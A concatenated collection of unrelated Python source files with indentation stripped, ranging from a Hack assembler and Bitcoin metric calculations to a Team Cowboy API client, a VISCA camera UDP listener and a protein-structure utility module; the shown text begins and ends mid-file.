LinesToTranslate = ToTranslate.readlines() #is there a yield here to be efficient?
SaveInList = []
for line in LinesToTranslate:
SaveInList.append(TranslateCommand(line[:-1])) #Write the translation of the Program line by line into HackFileName #Avoid giving the \n
#SaveInList.append("\n")
print(SaveInList)
print(LinesToTranslate)
SaveIn.writelines(SaveInList)
ToTranslate.close()
SaveIn.close()
return
def TranslateCommand(Command):
"""
Input: Takes a Translatable Command
Output: Produce a Hack Machine Language Command
Purpose: Translate given command to corresponding Hack Machine Language Command
"""
result=''
if Command[0]=='@':
result=str(bin(int(Command[1:])))[2:].zfill(16) #@Value remember, bin returns string already but how to specify its minimum length, 16 bit command, It is never negative
else:
destIndex=Command.find("=")
jumpIndex=Command.find(";")
if destIndex != -1:#It actually exists
dest=Command[:destIndex]
else:
dest = ""
if jumpIndex != -1:
jump=Command[jumpIndex+1:]
else:
jump = ""
comm=Command[destIndex+1: len(Command) if jumpIndex == -1 else jumpIndex] #if either inexistant: 0 to -1!!
#use dest, jump and comm to do your work!
#*AorM
AorM="0"
if "M" in comm:
AorM = '1'
else:
AorM = '0'
#*ComToFun see what is to be computed
ComToFun="000000"
if comm == "0":
ComToFun="101010"
elif comm == "1":
ComToFun="111111"
elif comm == "-1":
ComToFun="111010"
elif comm == "D":
ComToFun="001100"
elif comm == "A" or comm == "M":
ComToFun="110000"
elif comm == "!D":
ComToFun="001101"
elif comm == "!A" or comm == "!M":
ComToFun="110001"
elif comm == "-D":
ComToFun="001111"
elif comm == "-A" or comm == "-M":
ComToFun="110011"
elif comm == "D+1" or comm == "1+D":
ComToFun="011111"
elif comm == "A+1" or comm == "M+1" or comm == "1+A" or comm == "1+M":
ComToFun="110111"
elif comm == "D-1":
ComToFun="001110"
elif comm == "A-1" or comm == "M-1":
ComToFun="110010"
elif comm == "D+A" or comm == "D+M" or comm == "A+D" or comm == "M+D":
ComToFun="000010"
elif comm == "D-A" or comm == "D-M":
ComToFun="010011"
elif comm == "A-D" or comm == "M-D":
ComToFun="000111"
elif comm == "D&A" or comm == "D&M" or comm == "A&D" or comm == "M&D":
ComToFun="000000"
elif comm == "D|A" or comm == "D|M" or comm == "A|D" or comm == "M|D":
ComToFun="010101"
#*Destination
toA="0"
toM="0"
toD="0" #0 unless other notice
Destination="000"
for c in dest:
if c == "A": #Is there switch case capabilities
toA = "1"
elif c== "M":
toM = "1"
elif c == "D":
toD = "1"
Destination=toA+toD+toM
#*Jum
Jum="000"
if jump=="JGT":
Jum="001"
elif jump=="JEQ":
Jum="010"
elif jump=="JGE":
Jum="011"
elif jump=="JLT":
Jum="100"
elif jump=="JNE":
Jum="101"
elif jump=="JLE":
Jum="110"
elif jump=="JMP":
Jum="111"
result="111"+AorM+ComToFun+Destination+Jum
result=result+"\n"
return result
def TranslateCleanToHack():
File = "RectL.asm"
Path = "rect/"
FileName = Path + File
CleanFileName = Path + "Clean" + File
TranslatableFileName = Path + "Translatable" + File
HackFileName = Path + File[:-3] + "hack"
CleanAssembly(FileName, CleanFileName)
TranslatableAssembly(CleanFileName, TranslatableFileName)
AssembleToHackMachine(TranslatableFileName, HackFileName)
TranslateCleanToHack()
|
"""
Audio file handler
"""
import scipy.io.wavfile as wavfile
import numpy as np
class Media:
"""
Media: I/O functionality to read/write audio files
"""
def __init__(self, file_path, dtype=None):
self.file_path = file_path
self._dtype = dtype
@property
def sample_rate(self):
"""
Sample rate of audio file
"""
sample_rate, _ = wavfile.read(self.file_path)
return sample_rate
@property
def waveform(self):
"""
Raw waveform of entire audio file
"""
_, waveform = wavfile.read(self.file_path)
shape = np.shape(waveform)
if len(shape) > 1:
waveform = np.mean(waveform, axis=1)
if self._dtype is None:
return waveform
if waveform.dtype not in [self._dtype]:
waveform = waveform.astype(self._dtype) / np.iinfo(waveform.dtype).max
return waveform
@property
def duration(self):
"""
Length of the audio file (in seconds)
"""
return len(self.waveform) / float(self.sample_rate)
|
"""
Change this to set the game speed to see what's going on.
"""
GAME_SPEED = 1
# Usually there are a bunch of constants in this file... but...
MAX_CAR_VEL = 2300
|
# Calculate a Suite of Bitcoin Specific Metrics
#Data Science
import pandas as pd
import numpy as np
import math
import datetime as date
today = date.datetime.now().strftime('%Y-%m-%d')
import quandl
from checkonchain.general.coinmetrics_api import *
from checkonchain.general.regression_analysis import *
from checkonchain.btconchain.btc_schedule import *
class btc_add_metrics():
def __init__(self):
self.topcapconst = 35 #Top Cap = topcapconst * Avg Cap
self.blkrew_ratio = [1.0] #PoW Reward Fraction
self.sply_curtail = 144 #Supply curtailed to once a day
def btc_coin(self):
"""Pulls Coinmetrics v2 API Community,
adds early price data by Plan B (fills backwards)
"""
df = Coinmetrics_api('btc',"2009-01-03","2019-10-07").convert_to_pd()
#Coin age in days
df['age_days'] = (df[['date']] - df.loc[0,['date']])/np.timedelta64(1,'D')
#Coin age in supply issuance
df['age_sply'] = df['SplyCur'] / 21e6
#Add in Plan B Data for Price and Market Cap
#Create dataframe with Plan B price data before Coinmetrics has it
print('...adding monthly Plan B PriceUSD and CapMrktCurUSD 2009-10...')
planB_data = [
['01-10-2009',0.000763941940412529],
['01-11-2009',0.002],
['01-12-2009',0.002],
['01-01-2010',0.002],
['01-02-2010',0.002],
['01-03-2010',0.003],
['01-04-2010',0.0035],
['01-05-2010',0.0041],
['01-06-2010',0.04],
['01-07-2010',0.07]
]
df_planB = pd.DataFrame(data=planB_data,columns=['date','PriceUSD'])
df_planB['date'] = pd.to_datetime(df_planB['date'],utc=True)
#Populate Price and fill backwards
df['notes'] = str('')
for i in df_planB['date']:
df.loc[df.date==i,'PriceUSD'] = float(df_planB.loc[df_planB.date==i,'PriceUSD'])
df['PriceUSD'] = df['PriceUSD'].fillna(method='bfill')
for i in df_planB['date']:
df.loc[df.date==i,'CapMrktCurUSD'] = df.loc[df.date==i,'PriceUSD'] * df.loc[df.date==i,'SplyCur']
df.loc[df.date==i,'notes'] = 'PriceUSD and CapMrktCurUSD from Plan B data (@100TrillionUSD)'
#Restructure final dataset
df = df[[
'date', 'blk','age_days','age_sply',
'DailyIssuedNtv', 'DailyIssuedUSD', 'inf_pct_ann', 'S2F',
'AdrActCnt', 'BlkCnt', 'BlkSizeByte', 'BlkSizeMeanByte',
'CapMVRVCur', 'CapMrktCurUSD', 'CapRealUSD', 'DiffMean',
'FeeMeanNtv','FeeMeanUSD', 'FeeMedNtv', 'FeeMedUSD', 'FeeTotNtv', 'FeeTotUSD',
'PriceBTC', 'PriceUSD', 'PriceRealUSD', 'SplyCur',
'TxCnt', 'TxTfrCnt', 'TxTfrValAdjNtv', 'TxTfrValAdjUSD',
'TxTfrValMeanNtv', 'TxTfrValMeanUSD', 'TxTfrValMedNtv',
'TxTfrValMedUSD', 'TxTfrValNtv', 'TxTfrValUSD',
'notes'
]]
return df
def btc_sply(self,to_blk):
df = btc_supply_schedule(to_blk).btc_supply_function()
#Calculate projected S2F Models Valuations
btc_s2f_model = regression_analysis().regression_constants()['btc_s2f']
df['CapS2Fmodel'] = np.exp(
float(btc_s2f_model['coefficient'])
* np.log(df['S2F_ideal'])
+ float(btc_s2f_model['intercept'])
)
df['PriceS2Fmodel'] = df['CapS2Fmodel']/df['Sply_ideal']
#Calc S2F Model - Bitcoins Plan B Model
planb_s2f_model = regression_analysis().regression_constants()['planb']
df['CapPlanBmodel'] = np.exp(
float(planb_s2f_model['coefficient'])
* np.log(df['S2F_ideal'])
+ float(planb_s2f_model['intercept'])
)
df['PricePlanBmodel'] = df['CapPlanBmodel']/df['Sply_ideal']
return df
def btc_sply_curtailed(self,to_blk):
"""Curtail theoretical supply curve for charting"""
btc_sply_interval = self.sply_curtail
df = self.btc_sply(to_blk)
return df.iloc[::btc_sply_interval,:] #Select every 144 blocks
def btc_real(self):
"""Coinmetrics + Hashrate from QUANDL"""
print('...compiling Bitcoin specific metrics (coinmetrics + supply curve)...')
_coin = self.btc_coin()
_blk_max = int(_coin['blk'][_coin.index[-1]])
df = _coin[[
'date', 'blk', 'age_days','age_sply',
'CapMrktCurUSD', 'CapRealUSD', 'PriceUSD', 'PriceRealUSD',
'DailyIssuedNtv', 'DailyIssuedUSD',
'TxTfrCnt', 'TxTfrValAdjNtv', 'TxTfrValAdjUSD','TxTfrValNtv','TxTfrValUSD',
'FeeTotNtv','FeeTotUSD',
'S2F','inf_pct_ann', 'SplyCur',
'DiffMean', 'notes'
]]
return df
def btc_hash(self):
#QUANDL has 50 daily query limit
#Hashrate (GH/s --> 0.001 TH/s)
_real = self.btc_real()
df = pd.DataFrame()
df['pow_hashrate_THs'] = quandl.get("BCHAIN/HRATE")['Value'] #Pull hashrate data
df['date'] = df.index
df = df.reset_index(drop=True)
df['date'] = pd.to_datetime(df['date'],utc=True)
df = pd.merge(_real,df,on='date')
return df
def btc_subsidy_models(self):
print('...Calculating Bitcoin block subsidy models...')
df = self.btc_real()
#Calculate PoS Return on Investment
df['PoW_income_btc'] = df['DailyIssuedNtv']
df['PoW_income_usd'] = df['PoW_income_btc'] * df['PriceUSD']
return df
def btc_pricing_models(self):
print('...Calculating Bitcoin pricing models...')
_real = self.btc_real()
df = _real
# Average Cap and Average Price
df['CapAvg'] = df['CapMrktCurUSD'].fillna(0.0001) #Fill not quite to zero for Log charts/calcs
df['CapAvg'] = df['CapAvg'].expanding().mean()
df['PriceAvg'] = df['CapAvg']/df['SplyCur']
# Delta Cap and Delta Price
df['CapDelta'] = df['CapRealUSD'] - df['CapAvg']
df['PriceDelta'] =df['CapDelta']/df['SplyCur']
# Top Cap and Top Price
df['CapTop'] = df['CapAvg']*self.topcapconst
df['PriceTop'] =df['CapTop']/df['SplyCur']
#Calc S2F Model - Specific to Bitcoin
btc_s2f_model = regression_analysis().ln_regression(df,'S2F','CapMrktCurUSD','date')['model_params']
df['CapS2Fmodel'] = np.exp(float(btc_s2f_model['coefficient'])*np.log(df['S2F'])+float(btc_s2f_model['intercept']))
df['PriceS2Fmodel'] = df['CapS2Fmodel']/df['SplyCur']
#Calc S2F Model - Bitcoins Plan B Model
planb_s2f_model = regression_analysis().regression_constants()['planb']
df['CapPlanBmodel'] = np.exp(float(planb_s2f_model['coefficient'])*np.log(df['S2F'])+float(planb_s2f_model['intercept']))
df['PricePlanBmodel'] = df['CapPlanBmodel']/df['SplyCur']
# Inflow Cap and Inflow Price
df['CapInflow'] = df['DailyIssuedUSD'].expanding().sum()
df['PriceInflow'] =df['CapInflow']/df['SplyCur']
# Fee Cap and Fee Price
df['CapFee'] = df['FeeTotUSD'].expanding().sum()
df['PriceFee'] =df['CapFee']/df['SplyCur']
#Calculate Miner Income
df['MinerIncome'] = df['CapInflow'] + df['CapFee']
df['FeesPct'] = df['CapFee']/df['MinerIncome']
df['MinerCap'] = df['MinerIncome'].expanding().sum()
#Moving Averages
df['PriceUSD_128DMA'] = df['PriceUSD'].rolling(128).mean()
df['PriceUSD_200DMA'] = df['PriceUSD'].rolling(200).mean()
return df
def btc_oscillators(self):
print('...Calculating Bitcoin Oscillators...')
_pricing = self.btc_pricing_models()
df = _pricing
#Calc - NVT_28, NVT_90, NVTS, RVT_28, RVT_90, RVTS
df['NVT_28'] = df['CapMrktCurUSD'].rolling(28).mean()/ df['TxTfrValUSD'].rolling(28).mean()
df['NVT_90'] = df['CapMrktCurUSD'].rolling(90).mean()/df['TxTfrValUSD'].rolling(90).mean()
df['NVTS'] = df['CapMrktCurUSD']/ df['TxTfrValUSD'].rolling(28).mean()
df['RVT_28'] = df['CapRealUSD'].rolling(28).mean()/ df['TxTfrValUSD'].rolling(28).mean()
df['RVT_90'] = df['CapRealUSD'].rolling(90).mean()/df['TxTfrValUSD'].rolling(90).mean()
df['RVTS'] = df['CapRealUSD']/ df['TxTfrValUSD'].rolling(28).mean()
#Mayer Multiple
df['MayerMultiple'] = df['PriceUSD']/df['PriceUSD_200DMA']
return df
#BTC_subs = btc_add_metrics().btc_subsidy_models()
|
class Stacks:
Team = ""
Value = ""
class TeamStack(Stacks):
TeamValue = Stacks()
Lineups = 0
|
#!/usr/bin/env python
"""A simple script to display information about faces from the facetracer dataset.
This is useful for quickly seeing all the relevant data for a given face id.
It also shows how easy it is to parse the data for your own applications.
Note that fiducial point locations are RELATIVE TO THE CROP RECTANGLE.
You can use 'grep' on the output to just show particular fields.
Dataset webpage: http://www.cs.columbia.edu/CAVE/databases/facetracer/
"""
USAGE = '''FaceTracer dataset explorer, v1.0'
Usage: %s <face id>
'''
FIELDS = 'face_id crop_width crop_height crop_x0 crop_y0 yaw pitch roll left_eye_x0 left_eye_y0 left_eye_x1 left_eye_y1 right_eye_x0 right_eye_y0 right_eye_x1 right_eye_y1 mouth_x0 mouth_y0 mouth_x1 mouth_y1'.split()
def getLines(fname):
"""Returns the lines split by '\t' where the first element is the given id"""
lines = (l.strip().split('\t') for l in open(fname) if not l.startswith('#'))
lines = [l for l in lines]
return lines
def getLinesById(id, fname):
"""Returns the lines split by '\t' where the first element is the given id"""
lines = (l.strip().split('\t') for l in open(fname) if not l.startswith('#'))
ret = [l for l in lines if int(l[0]) == int(id)]
return ret
def fix(s):
"""Fixes a string by replacing _ with spaces and putting it in title case"""
return s.replace('_', ' ').title()
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print(USAGE % (sys.argv[0]))
sys.exit()
id = sys.argv[1]
try:
stats = getLinesById(id, 'facestats.txt')[0]
for f, s in zip(FIELDS, stats):
print('%s: %s' % (fix(f), s))
urls = getLinesById(id, 'faceindex.txt')[0]
imgurl, pageurl = urls[1:]
print('Image URL:', imgurl)
print('Page URL:', pageurl)
attrs = getLinesById(id, 'facelabels.txt')
for fid, attr, label in attrs:
print('%s: %s' % (fix(attr), fix(label)))
except IndexError:
print('Error: "%s" is an invalid id!' % (id))
except ValueError:
print('Error: "%s" is an invalid id!' % (id))
|
word_list_count = [0, 0, 0]
word_search = []
text = ''
for _ in range(3):
print('Введите', _ + 1, 'слово: ', end='')
word = input()
word_search.append(word)
while text != 'end':
text = input('Слово из текста: ')
for i in range(3):
if word_search[i] == text:
word_list_count[i] += 1
print('Подсчет слов в тексте')
for i in range(3):
print(word_search[i], ':', word_list_count[i])
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.utils.decorators import method_decorator
from django.views.generic.base import TemplateView
class HomeView(TemplateView):
template_name = 'routes/dashboard.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(HomeView, self).dispatch(*args, **kwargs)
|
import requests
from celery import shared_task
import logging
logger = logging.getLogger('django')
@shared_task()
def test():
print('Hello World')
return True
|
"""A Team Cowboy API client."""
import hashlib
import httplib
import json
import random
import sys
import time
import urllib
class TeamCowboyException(Exception):
"""A Team Cowboy error."""
pass
class TeamCowboy(object):
"""A Team Cowboy API client."""
def __init__(self, public_key, private_key):
"""Creates a new client.
Args:
public_key: The API public key.
private_key: The API private key.
"""
self._public_key = public_key
self._private_key = private_key
self._host = 'api.teamcowboy.com'
self._path = '/v1/'
def auth_get_user_token(self, username, password):
"""Gets an authentication token for the given user.
Args:
username: The username.
password: The password.
Returns:
An authentication token for the given user.
"""
params = {
'username': username,
'password': password
}
return self._send('POST', 'Auth_GetUserToken', params, True)
def test_get_request(self, test_param=''):
"""Sends a GET request to the test endpoint.
Args:
test_param: An optional string to send.
Returns:
A dict containing a 'helloWorld' attribute and, optionally, a 'testParam'
attribute.
"""
params = {'testParam': test_param}
return self._send('GET', 'Test_GetRequest', params)
def test_post_request(self, test_param=''):
"""Sends a POST request to the test endpoint.
Args:
test_param: An optional string to send.
Returns:
A dict containing a 'helloWorld' attribute and, optionally, a 'testParam'
attribute.
"""
params = {'testParam': test_param}
return self._send('POST', 'Test_PostRequest', params)
def user_get_teams(self, user_token, dashboard_teams_only=False):
params = {
'userToken': user_token['token'],
'dashboardTeamsOnly': '1' if dashboard_teams_only else '0'
}
return self._send('GET', 'User_GetTeams', params)
def team_get_events(
self, user_token, team_id, season_id=None, filter_type='future',
start_date_time=None, end_date_time=None, offset=0, qty=10,
include_rsvp_info=False):
"""Gets a list of events for a given team.
Args:
user_token: The user's auth token.
team_id: The team ID.
season_id: The season ID.
filter_type: The search filter type.
start_date_time: The start date from when to search.
end_date_time: The end date until when to search.
offset: The event offset.
qty: The number of games to fetch.
include_rsvp_info: Whether to include RSVP info.
Returns:
A list of events matching the given criteria.
"""
params = {
'userToken': user_token['token'],
'teamId': str(team_id),
'seasonId': str(season_id) if season_id else '',
'includeRSVPInfo': 'true' if include_rsvp_info else '',
'filter': filter_type,
'startDateTime': start_date_time if start_date_time else '',
'endDateTime': end_date_time if end_date_time else '',
'offset': str(offset),
'qty': str(qty)
}
return self._send('GET', 'Team_GetEvents', params)
def _send(self, http_method, tc_method, params, use_https=False):
"""Prepares and sends a request to Team Cowboy.
Args:
http_method: The HTTP method to use.
tc_method: The Team Cowboy method name.
params: The method parameters.
use_https: Whether to use HTTPS.
Returns:
A dict with response data.
Raises:
TeamCowboyException: When an error is returned.
"""
params.update({
'api_key': self._public_key,
'method': tc_method,
'timestamp': str(int(time.time())),
'nonce': str(self._generate_nonce())
})
params['sig'] = self._generate_signature(params, http_method)
data = urllib.urlencode(params)
if use_https:
http = httplib.HTTPSConnection(self._host)
else:
http = httplib.HTTPConnection(self._host)
if http_method == 'POST':
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
http.request(http_method, self._path, data, headers)
else:
http.request(http_method, '%s?%s' % (self._path, data))
response = http.getresponse()
result = json.loads(response.read())
http.close()
body = result['body']
if 'error' in body:
raise TeamCowboyException(body)
return body
def _generate_nonce(self):
"""Generates a one-time-use number.
Team Cowboy allows any value, so long as it is unique (it is unclear how
uniqueness is defined).
Returns:
A one-time-use number.
"""
return random.randint(10000000, sys.maxint)
def _generate_signature(self, params, method):
"""Generates a request signature.
Args:
params: A dict of request parameters.
method: The HTTP method of the request.
Returns:
A signature for the HTTP request.
"""
encoded = [
'%s=%s' % (urllib.quote(i).lower(), urllib.quote(params[i]).lower())
for i in sorted(params)]
s = '%s|%s|%s|%s|%s|%s' % (
self._private_key, method, params['method'], params['timestamp'],
params['nonce'], '&'.join(encoded))
return hashlib.sha1(s).hexdigest().lower()
|
import socket
from time import sleep
import binascii
port = 52381
buffer_size = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', port))
acknowledge_message = bytearray.fromhex('90 4Y FF'.replace('Y', '1')) # 1 = socket number
completion_message = bytearray.fromhex('90 5Y FF'.replace('Y', '1'))
visca_command_dictionary = {
b'81010601':'pan',
b'81010408':'focus',
b'81010438':'autofocus',
b'81010407':'zoom',
b'8101043f':'memory',
b'81017e01':'information_display',
b'81010400':'camera_power',
b'01':'reset_sequence_number'
}
while True:
data = s.recvfrom(buffer_size)
message = data[0]
address_port = data[1]
payload_type = message[0:2]
payload_length = int(binascii.hexlify(message[2:4]), 16)
sequence_number = int(binascii.hexlify(message[4:8]), 16)
payload = binascii.hexlify(message[8:])
message_type = payload[0:8]
try:
print(sequence_number, visca_command_dictionary[message_type])
except:
print(sequence_number, payload)
s.sendto(acknowledge_message, address_port)
sleep(0.1)
s.sendto(completion_message, address_port)
|
from enum import Enum
class StatBlockType(Enum):
ENCRYPTED = "encrypted"
COMPRESSED = "compressed"
def __str__(self) -> str:
return str(self.value)
|
#!/usr/bin/env python
__author__ = 'yuy001'
def test1():
print("Hello World")
print( 3*3 )
print( 5**2 )
if __name__ == "__main__":
test1()
|
import asyncio
from datetime import datetime
from typing import Iterable
import discord
from dateutil.relativedelta import relativedelta
from discord.ext import commands, tasks
from sqlalchemy import select
from common.db import session
from common.logging import logger
from datamodels.scheduling import ScheduledItem
from scheduling import parametric_transformer
from scheduling.types import ScheduleType
class Dispatcher(commands.Cog):
task_interval = 60
supported_handlers = {
ScheduleType.PARAMETRIC_TRANSFORMER: parametric_transformer.task_handler,
}
def __init__(self, bot: discord.Bot):
self.bot = bot
self.start_up = False
@commands.Cog.listener()
async def on_ready(self):
if not self.start_up:
self.job.start()
self.start_up = True
@tasks.loop(seconds=task_interval, reconnect=False)
async def job(self):
# Get all scheduled tasks within the interval
scheduled_tasks: Iterable[ScheduledItem] = (
session.execute(
select(ScheduledItem)
.where(
ScheduledItem.type.in_(self.supported_handlers),
ScheduledItem.scheduled_at
< datetime.utcnow() + relativedelta(seconds=self.task_interval),
~ScheduledItem.done,
)
.order_by(ScheduledItem.scheduled_at.asc())
)
.scalars()
.all()
)
# Sleep until the earliest task is ready
for task in scheduled_tasks:
scheduled_at = task.scheduled_at
wait_time = max((scheduled_at - datetime.utcnow()).total_seconds(), 0)
await asyncio.sleep(wait_time)
try:
logger.info(f"Dispatching task: {task.id}, {task.type}")
await self.supported_handlers[task.type](self.bot, task)
task.done = True
session.merge(task)
session.commit()
except Exception:
logger.exception("Task failed to dispatch")
pass
|
from classes.LinkedList import *
#The digits are stored in reverse order
def addLists_rev(L1, L2):
p1 = L1.head
p2 = L2.head
carry = 0
linkedlist_sum = LinkedList()
while (p1 != None) or (p2 != None) or (carry != 0):
dig_sum = carry
if p1 != None:
dig_sum += p1.value
p1 = p1.next
if p2 != None:
dig_sum += p2.value
p2 = p2.next
linkedlist_sum.addNode(dig_sum%10)
carry = dig_sum/10
return linkedlist_sum
# The digits are stored in forward order
# Iterative implementation
def addLists_fwd(L1, L2):
# Create two new linkedlists which are reversed version of L1 and L2
# Use addLists_rev method, then reverse the sum list
L1_rev = reverseLinkedlist(L1)
L2_rev = reverseLinkedlist(L2)
return reverseLinkedlist(addLists_rev(L1_rev, L2_rev))
# Recursive implementation of addLists_fwd
def addLists_fwd_2(L1, L2):
# compare length of linked lists and pad the shorter one with 0
l1_len = lengthOfLinkedlist(L1)
l2_len = lengthOfLinkedlist(L2)
if l1_len < l2_len:
L1 = padInFront(L1, l2_len - l1_len)
else:
L2 = padInFront(L2, l1_len - l2_len)
# Add lists
sumandcarry = addListsFwd2Helper(L1.head, L2.head)
result = LinkedList()
result.head = sumandcarry[0]
# If the carry is not 0, insert this at the front of the linked list
if sumandcarry[1] != 0:
addNodeInFront(result, sumandcarry[1])
return result
# Helper function for recursive adding lists
def addListsFwd2Helper(p1, p2):
if (p1 == None) and (p2 == None):
sumandcarry = [None,0] # a python list stores sum node and carry
return sumandcarry
sumandcarry = addListsFwd2Helper(p1.next, p2.next)
val = p1.value + p2.value + sumandcarry[1]
dig_node = insertBefore(sumandcarry[0], val%10)
carry = val/10
return [dig_node, carry]
# Helper function to insert node in the front of a linked list
def addNodeInFront(linkedlist, value):
node = Node(value)
node.next = linkedlist.head
linkedlist.head = node
# Helper function to insert node before a node
def insertBefore(node, value):
new_node = Node(value)
new_node.next = node
return new_node
# Helper function to create a reversed linedlist
def reverseLinkedlist(linkedlist):
current = linkedlist.head
newlinkedlist = LinkedList()
while current != None:
addNodeInFront(newlinkedlist, current.value)
current = current.next
return newlinkedlist
# Helper function to caculate length of a linked list
def lengthOfLinkedlist(linkedlist):
length = 0
current = linkedlist.head
while current != None:
length += 1
current = current.next
return length
# Helper funtion to pad the list with zeros in front
def padInFront(linkedlist, number):
padlist = LinkedList()
padlist.head = linkedlist.head
for i in range(number):
addNodeInFront(padlist, 0)
return padlist
#----------------test--------------
L1 = randomLinkedList(3,0,9)
L2 = randomLinkedList(5,0,9)
print L1
print L2
print "In reverse order, the sum is: "
print addLists_rev(L1, L2)
print "In forward order with iterative implementation, the sum is: "
print addLists_fwd(L1, L2)
print 'In forward order with recursive implementation, the sum is: '
print addLists_fwd_2(L1, L2)
|
"""
A module including custom decorators.
"""
from . import __version__
def add_version(f):
"""
Add the version of the tool to the help heading.
:param f: function to decorate
:return: decorated function
"""
doc = f.__doc__
f.__doc__ = "Version: " + __version__ + "\n\n" + doc
return f
|
#
# # Protool - Python class for manipulating protein structuress
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
def calculate_mass(PI):
"""Calculate the mass of all protein atoms in a Protool instance"""
weight=0.0
for residue in PI.residues:
if PI.isaa(residue):
weight=weight+PI.all_attribute[PI.three_to_one[PI.resname(residue)]]['Mw']
return weight-16.0
def calculate_unit_cell_volume(PI):
"""calculate the volume of the unit cell"""
cr=PI.cryst[0].split()
a=float(cr[1])
b=float(cr[2])
c=float(cr[3])
from math import *
alpha=radians(float(cr[4]))
beta=radians(float(cr[5]))
gamma=radians(float(cr[6]))
Vuc= a*b*c*sqrt(1.0-pow(cos(alpha),2)-pow(cos(beta),2)-pow(cos(gamma),2)+2.0*cos(alpha)*cos(beta)*cos(gamma))
return Vuc
SGdata={'P 42cm': 8, 'P 6(3)/mmc': 24, 'I4(1)/amd': 32, 'P 4 3 2': 24, 'P 42/mcm': 16, 'I4/mcm': 32, 'P-42(1)m': 8, 'Pn-3': 24, 'P4/nnc': 16, 'P-3c1': 12, 'Abm2': 8, 'P 21': 2, 'P-42(1)c': 8, 'P4/mbm': 16, 'P4/ncc': 16, 'P 41 21 2': 8, 'P3(1)12': 6, 'Pmc2(1)': 4, 'I-42d': 16, 'I4(1)22': 16, 'Cmm2': 8, 'I-42m': 16, 'P6(5)22': 12, 'R32': 18, 'C222(1)': 8, 'R-3c': 36, 'P321': 6, 'R-3': 18, 'R3': 9, 'P-6c2': 12, 'I 4 3 2': 48, 'R-3m': 36, 'Pbcn': 8, 'Pbcm': 8, 'Pbca': 8, 'R3m': 18, 'P6/mcc': 24, 'Pmn2(1)': 4, 'Cmma': 16, 'Cmmm': 16, 'P6(3)22': 12, 'R3c': 18, 'Iba2': 8, 'Pm-3m': 48, 'F432': 96, 'Ia-3': 48, 'Ama2': 8, 'P 43 2 2': 8, 'P 21 3': 12, 'F222': 16, 'P 4 21 2': 8, 'P3(2)21': 6, 'P 4/n': 8, 'Pmmn': 8, 'Pmmm': 8, 'Imma': 16, 'Pmma': 8, 'P 21/c': 4, 'P 2/m': 4, 'I4(1)/acd': 32, 'P6mm': 12, 'I-4': 8, 'P3m1': 6, 'P 2/c': 4, 'P 21/m': 4, 'Pccn': 8, 'I2(1)3': 24, 'Pccm': 8, 'P-4c2': 8, 'Pnn2': 4, 'Pcca': 8, 'Pbam': 8, 'P 41 2 2': 8, 'Pban': 8, 'P 42 /ncm': 16, 'P-3m1': 12, 'P4(2)mc': 8, 'P 62 2 2': 12, 'P 41': 4, 'Ibca': 16, 'P 2': 2, 'P3': 3, 'P 1': 1, 'P6': 6, 'P4(3)32': 24, 'P 4': 4, 'P 42 /mbc': 16, 'P4(2)/m': 8, 'P4(2)/n': 8, 'Pmna': 8, 'P4(2)bc': 8, 'P-4b2': 8, 'Pmm2': 4, 'Fd-3': 96, 'Imm2': 8, 'P3(2)': 3, 'P6(3)': 6, 'P-6': 6, 'P4/mcc': 16, 'P 41 32': 24, 'P6(1)': 6, 'I-43d': 48, 'Pba2': 4, 'Pnnm': 8, 'P 42': 4, 'Pcc2': 4, 'Pnna': 8, 'P6(1)22': 12, 'P 43 21 2': 8, 'C2/c': 8, 'P-62c': 12, 'Pnma': 8, 'P4/m': 8, 'P6/mmm': 24, 'Amm2': 8, 'P3c1': 6, 'P 21 21 21': 4, 'Fmm2': 16, 'I 2 3': 24, 'P-6m2': 12, 'P4/nbm': 16, 'I4/mmm': 32, 'F4(1)32': 96, 'Fm-3m': 192, 'Immm': 16, 'P3(1)': 3, 'P4/mmm': 16, 'P4(2)/nmc': 16, 'P4cc': 8, 'Pa-3': 24, 'P6(3)cm': 12, 'Aba2': 8, 'P 43': 4, 'Fddd': 32, 'P6cc': 12, 'I4(1)': 8, 'Ibam': 16, 'C2': 4, 'P-4m2': 8, 'I-43m': 48, 'I422': 16, 'Pca2(1)': 4, 'P3(2)12': 6, 'P 42 32': 24, 'I2(1)2(1)2(1)': 8, 'I4(1)cd': 16, 'I4/m': 16, 'P6(2)': 6, 'P 2 3': 12, 'Fmmm': 32, 'F-43c': 96, 'P6/m': 12, 'P-43n': 24, 'P6(4)22': 12, 'P4bm': 8, 'Fdd2': 16, 'Cm': 4, 'Pc': 2, 'Cc': 4, 'I222': 8, 'F23': 48, 'P-31c': 12, 'P31c': 6, 'I-4m2': 16, 'P3(1)21': 6, 'P-31m': 12, 'P4nc': 8, 'I4mm': 16, 'I4(1)32': 48, 'I4(1)/a': 16, 'P4/mnc': 16, 'I-4c2': 16, 'P622': 12, 'Pna2(1)': 4, 'Im-3': 48, 'P6(3)/mcm': 24, 'P 42 21 2': 8, 'P312': 6, 'P6(4)': 6, 'F4-3m': 96, 'Pn-3n': 48, 'Pn-3m': 48, 'P 2 2 21': 4, 'I4': 8, 'Ccca': 16, 'C2/m': 8, 'P-42c': 8, 'P-42m': 8, 'Pm': 2, 'Cccm': 16, 'C222': 8, 'P31m': 6, 'P4/nmm': 16, 'Cmcm': 16, 'Pnnn': 8, 'Fm-3': 96, 'Cmca': 16, 'P4mm': 8, 'P422': 8, 'P 42 nm': 8, 'P4(2)/nbc': 16, 'Pma2': 4, 'P6(3)/m': 12, 'P6(3)mc': 12, 'P-62m': 12, 'Pnc2': 4, 'P-4': 4, 'Ccc2': 8, 'P-4n2': 8, 'I4cm': 16, 'Cmc2(1)': 8, 'P-1': 2, 'P-43m': 24, 'P-3': 6, 'P 2 2 2': 4, 'P 42/mnm': 16, 'P 65': 6, 'Pm-3': 24, 'P 42 2 2': 8, 'P 21 21 2': 4, 'P 